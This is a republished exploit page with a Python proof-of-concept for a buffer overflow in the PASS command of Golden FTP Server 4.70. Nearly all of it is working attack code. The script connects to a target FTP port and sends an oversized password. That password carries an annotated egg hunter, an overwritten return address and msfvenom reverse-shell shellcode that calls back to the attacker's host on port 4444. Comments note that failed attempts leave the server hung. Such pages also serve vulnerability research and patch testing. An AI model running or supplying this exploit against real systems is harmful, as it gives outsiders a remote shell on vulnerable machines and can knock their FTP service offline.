Golden FTP Server 4.70 – ‘PASS’ Buffer Overflow (2) – Digitalmunition

Published on March 9th, 2021

#!/usr/local/bin/python3
# Golden FTP Server 4.70 - 'PASS' Buffer Overflow (2)
# Author: 1F98D
# Original Authors: Craig Freyman (cd1zz) and Gerardo Iglesias Galvan (iglesiasgg)
# Tested on Windows 10 (x64)
#
# A buffer overflow exists in GoldenFTP during the authentication process.
# Note that the source IP address of the user performing the authentication
# forms part of the buffer and as such must be accounted for when calculating
# the appropriate offset. It should also be noted that the exploit is
# rather unstable and if exploitation fails, GoldenFTP will be left in
# a state where it will still accept connections, but it will be unable
# to handle or process them in any way, so be careful.
#

from socket import socket, AF_INET, SOCK_STREAM

# Your address forms part of the buffer length calculation
SOURCE = '192.168.1.1'
TARGET = '192.168.1.2'
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 21))

# msfvenom -p windows/shell_reverse_tcp -f python -b '\x00\x0a\x0d' LHOST=192.168.1.1 LPORT=4444
buf =  b""
buf += b"\xba\x1e\xb6\xaa\x95\xda\xc3\xd9\x74\x24\xf4\x5d\x29"
buf += b"\xc9\xb1\x52\x83\xc5\x04\x31\x55\x0e\x03\x4b\xb8\x48"
buf += b"\x60\x8f\x2c\x0e\x8b\x6f\xad\x6f\x05\x8a\x9c\xaf\x71"
buf += b"\xdf\x8f\x1f\xf1\x8d\x23\xeb\x57\x25\xb7\x99\x7f\x4a"
buf += b"\x70\x17\xa6\x65\x81\x04\x9a\xe4\x01\x57\xcf\xc6\x38"
buf += b"\x98\x02\x07\x7c\xc5\xef\x55\xd5\x81\x42\x49\x52\xdf"
buf += b"\x5e\xe2\x28\xf1\xe6\x17\xf8\xf0\xc7\x86\x72\xab\xc7"
buf += b"\x29\x56\xc7\x41\x31\xbb\xe2\x18\xca\x0f\x98\x9a\x1a"
buf += b"\x5e\x61\x30\x63\x6e\x90\x48\xa4\x49\x4b\x3f\xdc\xa9"
buf += b"\xf6\x38\x1b\xd3\x2c\xcc\xbf\x73\xa6\x76\x1b\x85\x6b"
buf += b"\xe0\xe8\x89\xc0\x66\xb6\x8d\xd7\xab\xcd\xaa\x5c\x4a"
buf += b"\x01\x3b\x26\x69\x85\x67\xfc\x10\x9c\xcd\x53\x2c\xfe"
buf += b"\xad\x0c\x88\x75\x43\x58\xa1\xd4\x0c\xad\x88\xe6\xcc"
buf += b"\xb9\x9b\x95\xfe\x66\x30\x31\xb3\xef\x9e\xc6\xb4\xc5"
buf += b"\x67\x58\x4b\xe6\x97\x71\x88\xb2\xc7\xe9\x39\xbb\x83"
buf += b"\xe9\xc6\x6e\x03\xb9\x68\xc1\xe4\x69\xc9\xb1\x8c\x63"
buf += b"\xc6\xee\xad\x8c\x0c\x87\x44\x77\xc7\x68\x30\x76\x16"
buf += b"\x01\x43\x78\x09\x8d\xca\x9e\x43\x3d\x9b\x09\xfc\xa4"
buf += b"\x86\xc1\x9d\x29\x1d\xac\x9e\xa2\x92\x51\x50\x43\xde"
buf += b"\x41\x05\xa3\x95\x3b\x80\xbc\x03\x53\x4e\x2e\xc8\xa3"
buf += b"\x19\x53\x47\xf4\x4e\xa5\x9e\x90\x62\x9c\x08\x86\x7e"
buf += b"\x78\x72\x02\xa5\xb9\x7d\x8b\x28\x85\x59\x9b\xf4\x06"
buf += b"\xe6\xcf\xa8\x50\xb0\xb9\x0e\x0b\x72\x13\xd9\xe0\xdc"
buf += b"\xf3\x9c\xca\xde\x85\xa0\x06\xa9\x69\x10\xff\xec\x96"
buf += b"\x9d\x97\xf8\xef\xc3\x07\x06\x3a\x40\x37\x4d\x66\xe1"
buf += b"\xd0\x08\xf3\xb3\xbc\xaa\x2e\xf7\xb8\x28\xda\x88\x3e"
buf += b"\x30\xaf\x8d\x7b\xf6\x5c\xfc\x14\x93\x62\x53\x14\xb6"

total_length = 545-len(SOURCE)
eip = b'\x7f\x79\x4c\x00'
hunter =  b'\x90\x90\x90\x90\x90\x90' # padding              ; nop slide to account for variable offset based on source ip
hunter += b'\xfd'                     # std                  ; set df flag so we search high to low
hunter += b'\xb8\x43\x42\x41\x40'     # mov eax, 0x40414243  ; egg
hunter += b'\x89\xF7'                 # mov edi, esi         ; start searching from esi
hunter += b'\x47'                     # inc edi
hunter += b'\x90'                     # nop
hunter += b'\x83\xC7\x03'             # add edi, 0x3         ; scasd decrements by 4, add 3 so we search 1 by 1
hunter += b'\xaf'                     # scasd                ; check for egg at edi
hunter += b'\x75\xfa'                 # short jnz -0x6       ; jump back to add edi, 0x3
hunter += b'\x83\xC7\x03'             # add edi, 0x3
hunter += b'\xaf'                     # scasd
hunter += b'\x75\xfa'                 # short jnz -0x6
hunter += b'\x83\xC7\x1f'             # add edi, 0x1f        ; account for egg hunter
hunter += b'\xff\xe7'                 # jmp edi              ; egg found, let's go!
hunter += b'\x90\x90\x90\x90\x90\x90' # padding              ; nop slide to account for variable offset again

payload = hunter + buf + b'\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip

s.send(b'USER anonymous\r\n')
print(s.recv(1024))
print(s.recv(1024))
s.send(b'PASS ' + payload + b'\r\n')
print(s.recv(1024))
s.send(b'QUIT\r\n')
print(s.recv(1024))
            
